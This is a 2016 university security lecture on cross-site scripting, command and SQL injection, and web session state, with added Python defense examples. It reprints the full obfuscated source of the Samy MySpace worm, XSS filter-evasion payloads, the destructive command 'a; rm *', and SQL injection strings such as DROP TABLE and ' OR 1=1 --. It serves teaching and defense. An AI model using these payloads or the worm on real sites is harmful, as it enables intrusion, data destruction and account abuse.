CSE 484 / CSE M 584: Computer Security and Privacy
XSS attacks
Fall 2016
Ada (Adam) [email protected]
Thanks to Franzi Roesner, Dan Boneh, Dieter Gollmann, Dan Halperin, Yoshi Kohno, John Manferdelli, John Mitchell, Vitaly Shmatikov, Bennet Yee, and many others for sample slides and materials...

OWASP Top 10 Web Vulnerabilities
1. Injection
2. Broken Authentication & Session Management
3. Cross-Site Scripting
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross-Site Request Forgery
9. Using Known Vulnerable Components
10. Unvalidated Redirects and Forwards
11/14/16 CSE484/CSEM584-Fall2016 2
http://www.owasp.org

CSRF
• "Confused Deputy" – the browser acts with Alice's privileges (cookies) even when directed to make requests by an attacker
• Defenses:
  – Form synchronization tokens
  – Referer header checking

Cross-Site Scripting (XSS)

XSS
• I have a friend with a really hard to pronounce name.
Her name is "<img src='http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png'>"!
PHP: Hypertext Preprocessor
PHP prints out: <?php echo $name; ?>

XSS
• "Reflected" XSS – vulnerable service echoes user input directly from input (e.g., from query string in URL)
  – example.com?name=<img src=…
• "Stored" XSS – vulnerable service echoes user input stored in database
  – E.g., make a social media post that includes a <script> tag, and when other people read your post…

Defenses: Cross-Site Scripting (XSS)
• Any user input and client-side data must be preprocessed before it is used inside HTML
• Remove/encode HTML special characters
  – Use a good escaping library
    • OWASP ESAPI (Enterprise Security API)
    • Microsoft's AntiXSS
  – In PHP, htmlspecialchars(string) will replace all special characters with their HTML codes
    • ' becomes &#039;, " becomes &quot;, & becomes &amp;
  – In ASP.NET, Server.HtmlEncode(string)

With appropriate defenses
naive.com/hello.cgi?name=Bob!
Welcome, dear Bob
naive.com/hello.cgi?name=<img src='http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png'>!
Welcome, dear <img src='http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png'>!

With filters in place
• <html>Welcome, dear Bob</html>
• <img src='http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png'>

Evading XSS Filters
• Preventing injection of scripts into HTML is hard!
  – Blocking "<" and ">" is not enough
  – Event handlers, stylesheets, encoded inputs (%3C), etc.
  – phpBB allowed simple HTML tags like <b>
    <b c=">" onmouseover="script" x="<b">Hello<b>

Evading XSS Filters
• Filter evasion tricks (XSS Cheat Sheet)
  – If filter allows quoting (of <script>, etc.), beware of malformed quoting: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  – Long UTF-8 encoding
  – Scripts are not only in <script>: <iframe src='https://bank.com/login' onload='steal()'>
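Added example (not from the slides) contrasting the bracket-stripping filter discussed above with output encoding of the htmlspecialchars() kind, in Python. The three inputs are constructed from the slides' own cases, and the assumption that the filter inspects the raw query-string value before URL decoding is mine:

```python
import html
from urllib.parse import unquote

# Constructed inputs modelled on the slides: the friend's <img> "name", the same
# idea arriving URL-encoded (%3C), and an attribute-breaking value with no brackets.
YOSHI = ("<img src='http://upload.wikimedia.org/wikipedia/en/thumb/3/39/"
         "YoshiMarioParty9.png/210px-YoshiMarioParty9.png'>")
ENCODED = "%3Cimg%20src%3Dx%3E"         # decodes to <img src=x>
ATTR_BREAK = '" onmouseover="script'    # closes the attribute, adds an event handler


def bracket_filter(value: str) -> str:
    """The 'block < and >' idea the slides say is not enough."""
    return value.replace("<", "").replace(">", "")


def render_with_filter(raw_param: str) -> str:
    """Assumed deployment: the filter sees the raw query-string value and
    URL-decoding happens afterwards, so %3C is invisible to it. The output is the
    slide's 'Welcome, dear <?php echo $name; ?>' with the name also in an attribute."""
    name = unquote(bracket_filter(raw_param))
    return f'<p title="{name}">Welcome, dear {name}</p>'


def render_with_escaping(raw_param: str) -> str:
    """Decode first, then encode for the HTML context at output time.
    html.escape(quote=True) rewrites < > & " ' like htmlspecialchars(ENT_QUOTES)."""
    name = html.escape(unquote(raw_param), quote=True)
    return f'<p title="{name}">Welcome, dear {name}</p>'


def injected_markup_present(rendered: str) -> bool:
    """Check used by the tests: anything inside our own <p ...>...</p> wrapper that
    opens a tag or starts an on* attribute means the input was treated as code."""
    inner = rendered[len('<p title="'):-len("</p>")]
    return "<" in inner or '" on' in inner
```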

MySpace Worm (1)
• Users can post HTML on their MySpace pages
• MySpace does not allow scripts in users' HTML
  – No <script>, <body>, onclick, <a href=javascript://>
• …but does allow <div> tags for CSS.
  – <div style="background:url('javascript:alert(1)')">
• But MySpace will strip out "javascript"
  – Use "java<NEWLINE>script" instead
• But MySpace will strip out quotes
  – Convert from decimal instead: alert('double quote:' + String.fromCharCode(34))
http://namb.la/popular/tech.html

MySpace Worm (2)
Resulting code:
<div id=mycode style="BACKGROUND: url('java �script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new 
ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return 
false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
http://namb.la/popular/tech.html

MySpace Worm (3)
• "There were a few other complications and things to get around. This was not by any means a straightforward process, and none of this was meant to cause any damage or piss anyone off. This was in the interest of.. interest. It was interesting and fun!"
• Started on "samy" MySpace page
• Everybody who visits an infected page becomes infected and adds "samy" as a friend and hero
• 5 hours later "samy" has 1,005,831 friends
  – Was adding 1,000 friends per second at its peak
http://namb.la/popular/tech.html

Command Injection and SQL Injection

Command Injection in PHP
http://victim.com/copy.php?name=username
copy.php includes system("cp temp.dat $name.dat")
What if username = "/etc/shadow"?
Attacker uses name "a; rm *"
http://victim.com/copy.php?name="a; rm *"
copy.php executes system("cp temp.dat a; rm *.dat");
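An added Python version of what copy.php should do instead of system() (example code, not from the slides). The allow-list pattern for legitimate names and the function names are assumptions:

```python
import re
import subprocess

# Assumption: legitimate names are short alphanumerics; anything else is rejected.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def copy_argv(name: str) -> list:
    """Build the argument vector for the slide's cp without invoking a shell.
    A list passed to subprocess makes 'a; rm *' one literal filename rather than
    two commands, but a shell-free call alone still lets '/etc/shadow' or '../x'
    choose the destination path; the allow-list check is what closes that hole."""
    if NAME_RE.fullmatch(name) is None:
        raise ValueError(f"rejected name: {name!r}")
    return ["cp", "temp.dat", f"{name}.dat"]


def copy_file(name: str) -> int:
    """Replacement for system("cp temp.dat $name.dat"); returns cp's exit status."""
    return subprocess.run(copy_argv(name), shell=False, check=False).returncode


def is_safe_name(name: str) -> bool:
    """True if copy_argv would accept the name."""
    try:
        copy_argv(name)
    except ValueError:
        return False
    return True
```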

SQL
• Widely used database query language
• Fetch a set of records
  SELECT * FROM Person WHERE Username='lerner'
• Add data to the table
  INSERT INTO Key (Username, Key) VALUES ('lerner', 3611BBFF)
• Modify data
  UPDATE Keys SET Key=FA33452D WHERE PersonID=5
• Query syntax (mostly) independent of vendor

Naïve Query Generation Code
$selecteduser = $_GET['user'];
$sql = "SELECT Username, Key FROM Key " . "WHERE Username='$selecteduser'";
$rs = $db->executeQuery($sql);
What if 'user' is a malicious string that changes the meaning of the query?

Typical Login Prompt

User Input Becomes Part of Query
[Figure: Web browser (Client) → "Enter Username & Password" → Web server → DB]
SELECT passwd FROM USERS WHERE uname IS '$user'

Normal Login
[Figure: Web browser (Client) → "Enter Username & Password" → Web server → DB]
SELECT passwd FROM USERS WHERE uname IS 'franzi'

Malicious User Input

SQL Injection Attack
[Figure: Web browser (Client) → "Enter Username & Password" → Web server → DB]
SELECT passwd FROM USERS WHERE uname IS ''; DROP TABLE USERS; --'
Eliminates all user accounts

Exploits of a Mom
http://xkcd.com/327/

SQL Injection: Basic Idea
[Figure: Attacker → (1) post malicious form → Victim server → (2) unintended query → Victim SQL DB → (3) receive data from DB]
• This is an input validation vulnerability
• Unsanitized user input in SQL query to back-end database changes the meaning of query
• Special case of command injection

Authentication with Backend DB
set UserFound = execute("SELECT * FROM UserTable WHERE username='" & form("user") & "' AND password='" & form("pwd") & "'");
User supplies username and password; this SQL query checks if user/password combination is in the database
If not UserFound.EOF
  Authentication correct
else
  Fail
Only true if the result of SQL query is not empty, i.e., user/pwd is in the database

Using SQL Injection to Log In
• User gives username ' OR 1=1 --
• Web server executes query
  set UserFound = execute(SELECT * FROM UserTable WHERE username='' OR 1=1 -- …);
  Always true! Everything after -- is ignored!
• Now all records match the query, so the result is not empty ⇒ correct "authentication"!

Preventing SQL Injection
• Validate all inputs
  – Filter out any character that has special meaning
    • Apostrophes, semicolons, percent, hyphens, underscores, …
  – Use escape characters to prevent special characters from becoming part of the query code
    • E.g.: escape(O'Connor) = O\'Connor
  – Check the data type (e.g., input must be an integer)

Prepared Statements
PreparedStatement ps = db.prepareStatement("SELECT pizza, toppings, quantity, order_day " + "FROM orders WHERE userid=? AND order_month=?");
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2, Integer.parseInt(request.getParameter("month")));
ResultSet res = ps.executeQuery();
• Bind variables: placeholders guaranteed to be data (not code)
• Query is parsed without data parameters
• Bind variables are typed (int, string, …)
Bind variable (data placeholder): the ? in the query
http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html
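Added example in Python (not the lecture's code) of the login check from the authentication slides done both by string concatenation and with bind variables, plus a typed bind variable in the style of the prepared statement above. The in-memory SQLite tables, their rows and the function names are constructed for the example:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for UserTable and for the orders table on the
    prepared-statement slide (in-memory SQLite, one row each)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    db.execute("INSERT INTO UserTable VALUES ('franzi', 'correct-horse')")
    db.execute("CREATE TABLE orders (userid INTEGER, order_month INTEGER, pizza TEXT)")
    db.execute("INSERT INTO orders VALUES (5, 11, 'margherita')")
    return db


def login_naive(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """String concatenation as in execute("... username='" & form("user") & "' ...").
    Whatever the user typed is handed to the SQL parser as part of the statement."""
    sql = ("SELECT * FROM UserTable WHERE username='" + user
           + "' AND password='" + pwd + "'")
    return db.execute(sql).fetchone() is not None


def login_prepared(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Bind variables: the statement is parsed with '?' placeholders, then the
    values are attached as data, so a quote or '--' in the input is only text."""
    sql = "SELECT * FROM UserTable WHERE username=? AND password=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None


def orders_for_month(db: sqlite3.Connection, user_id: int, month: str) -> list:
    """Typed bind variable, like ps.setInt(2, Integer.parseInt(...)) on the slide:
    int() rejects anything that is not a number before it gets near the query."""
    sql = "SELECT pizza FROM orders WHERE userid=? AND order_month=?"
    return db.execute(sql, (user_id, int(month))).fetchall()
```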

Top Web Vulnerabilities: Summary
• XSRF (CSRF) – cross-site request forgery
  – Bad web site forces the user's browser to send a request to a good web site
• XSS (CSS) – cross-site scripting
  – Malicious code injected into a trusted context (e.g., malicious data presented by an honest web site interpreted as code by the user's browser)
• SQL injection
  – Malicious data sent to a web site is interpreted as code in a query to the web site's back-end database

Web Session Management

Primitive Browser Session
www.e_buy.com
View catalog → www.e_buy.com/shopping.cfm?pID=269
Select item → www.e_buy.com/shopping.cfm?pID=269&item1=102030405
Checkout → www.e_buy.com/checkout.cfm?pID=269&item1=102030405
Store session information in URL; easily read on network

Bad Idea: Encoding State in URL
• Unstable, frequently changing URLs
• Vulnerable to eavesdropping and modification
• There is no guarantee that URL is private

FatBrain.com circa 1999
• User logs into web site with his password, authenticator is generated, user is given special URL containing the authenticator
  – With special URL, user doesn't need to re-authenticate
• Reasoning: user could not have known the special URL without authenticating first. That's true, BUT…
• Authenticators are global sequence numbers
  – It's easy to guess sequence number for another user
  – Partial fix: use random authenticators
https://www.fatbrain.com/HelpAccount.asp?t=0&[email protected]&p2=540555758
https://www.fatbrain.com/HelpAccount.asp?t=0&p1=SomeoneElse&p2=540555752

Typical Solution: Web Authentication via Cookies
• Servers can use cookies to store state on client
  – When session starts, server computes an authenticator and gives it back to browser in the form of a cookie
• Authenticators must be unforgeable and tamper-proof
  – Malicious client shouldn't be able to compute his own or modify an existing authenticator
• Example: MAC(server's secret key, session id)
  – With each request, browser presents the cookie
  – Server recomputes and verifies the authenticator
• Server does not need to remember the authenticator

Storing State in Hidden Forms
• Dansie Shopping Cart (2006)
  – "A premium, comprehensive, Perl shopping cart. Increase your web sales by making it easier for your web store customers to order."
<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
Black Leather purse with leather straps<BR>Price: $20.00<BR>
<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
<INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
<INPUT TYPE=HIDDEN NAME=sh VALUE="1">
<INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
<INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>
Change this (the hidden price field) to 2.00: bargain shopping!
Fix: MAC client-side data, or, more likely, keep on server.
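Added example (not from the slides) of the "MAC client-side data" fix on this slide and of the MAC(server's secret key, session id) cookie from the session slide, in Python with HMAC-SHA256. The hidden-field names come from the form above; the key handling, the JSON canonical encoding and the function names are assumptions:

```python
import hashlib
import hmac
import json
import secrets

# Assumption: one secret generated when the server starts; it never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def authenticator(fields: dict) -> str:
    """MAC(server's secret key, data). JSON with sorted keys is one canonical
    encoding, so a client cannot re-split or reorder fields and keep the tag."""
    msg = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


# Hidden-form case (Dansie-style cart).
def issue_form_fields(item: dict) -> dict:
    """Server emits the hidden fields plus a 'sig' field covering all of them."""
    return {**item, "sig": authenticator(item)}


def verify_form_fields(posted: dict) -> bool:
    """On POST, recompute the tag over everything except 'sig' and compare in
    constant time; a price edited in the browser no longer verifies."""
    fields = {k: v for k, v in posted.items() if k != "sig"}
    expected = authenticator(fields).encode()
    return hmac.compare_digest(expected, str(posted.get("sig", "")).encode())


# Cookie case: MAC(server's secret key, session id).
def issue_session_cookie(session_id: str) -> str:
    return f"{session_id}.{authenticator({'sid': session_id})}"


def verify_session_cookie(cookie: str):
    """Returns the session id if the cookie is genuine, else None. The server
    remembers nothing per session; SERVER_KEY is all it needs to check."""
    sid, _, tag = cookie.rpartition(".")
    if not sid or not hmac.compare_digest(authenticator({"sid": sid}).encode(),
                                          tag.encode()):
        return None
    return sid


# Constructed sample: the hidden fields from the cart form on the slide.
PURSE = {"name": "Black leather purse", "price": "20.00", "sh": "1", "img": "purse.jpg"}
```

The tag gives integrity only: the client can still read every field and replay an old, correctly tagged cookie or form, which is why "more likely, keep on server" remains the stronger option.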